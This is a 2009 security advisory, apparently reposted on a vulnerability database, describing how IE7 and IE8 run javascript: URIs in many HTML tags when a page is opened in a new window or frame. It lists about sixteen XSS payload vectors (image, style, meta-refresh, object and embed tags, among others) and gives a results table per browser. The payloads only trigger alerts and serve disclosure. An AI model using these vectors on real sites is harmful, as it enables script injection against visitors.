Multiple Exploiting IE8/IE7 XSS Vulnerability

2009.06.22
Credit: IEhrepus
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-79

Multiple Exploiting IE8/IE7 XSS Vulnerability Author: www.80vul.com [Email:5up3rh3i#gmail.com] Release Date: 2009/06/22 References: http://www.80vul.com/ie8/Multiple%20Exploiting%20IE8IE7%20XSS%20Vulnerability.txt Overview: Tags[not include <IFRAME>] in ie7/8 are don't allowe to run "javascript:[jscodz]",but we found them allowed ro run where open it in new target. like this url: http://www.80vul.com/test/ie8-1.htm ie8-1.htm's codz : <STYLE>&#64;import 'javascript:alert("xss1")';</STYLE> <IMG SRC=javascript:alert('XSS2')> <BODY BACKGROUND="javascript:alert('XSS3')"> <LINK REL="stylesheet" HREF="javascript:alert('XSS4');"> <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS5');"> <IFRAME SRC="javascript:alert('XSS6');"></IFRAME> <DIV STYLE="background-image: url(javascript:alert('XSS7'))"> <STYLE>.XSS{background-image:url("javascript:alert('XSS8')");}</STYLE><A CLASS=XSS></A> <STYLE type="text/css">BODY{background:url("javascript:alert('XSS9')")}</STYLE> <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS10')></OBJECT> <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> <script SRC="javascript:alert('xss11');"></script> <video SRC="javascript:alert('xss12');"</video> <LAYER SRC="javascript:alert('xss13')"></LAYER> <embed src="javascript:alert('xss14')" type="application/x-shockwave-flash" allowscriptaccess="always" width="0" height="0"></embed> <applet src="javascript:alert('xss15')" type=text/html> when visite this url by ie7/8, <IFRAME SRC="javascript:alert('XSS6');"></IFRAME> this is runing, but other aren't to run. but, where open ie8-1.htm in new target[like this :<a href= target="_blank"> and <iframe> and window.open in <sript> ... etc.] ,so test this codz in my localhost: <a href="http://www.80vul.com/test/ie8-1.htm" target="_blank">go</a> [PS: go don't work] of couse this codz: <iframe src="http://www.80vul.com/test/ie8s.htm"></iframe> and this codz: <script>window.open("http://www.80vul.com/test/ie8-1.htm");</script> ........[testing]....... So the results is : --------------------------------------------------------- IE | alert --------------------------------------------------------- ie7: xss4/xss3/xss2/xss1/xss8/xss/xss11/xss7/xss6/xss9 ------------------------------------------------------ ie8: xss4/xss1/xss11/xss6 --------------------------------------------------------- Disclosure Timeline: 2009/05/01 - Found this Vulnerability 2009/06/22 - Public Disclosure Greeting: ycosxhack

References:

http://seclists.org/fulldisclosure/2009/Jun/0215.html
http://www.80vul.com


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top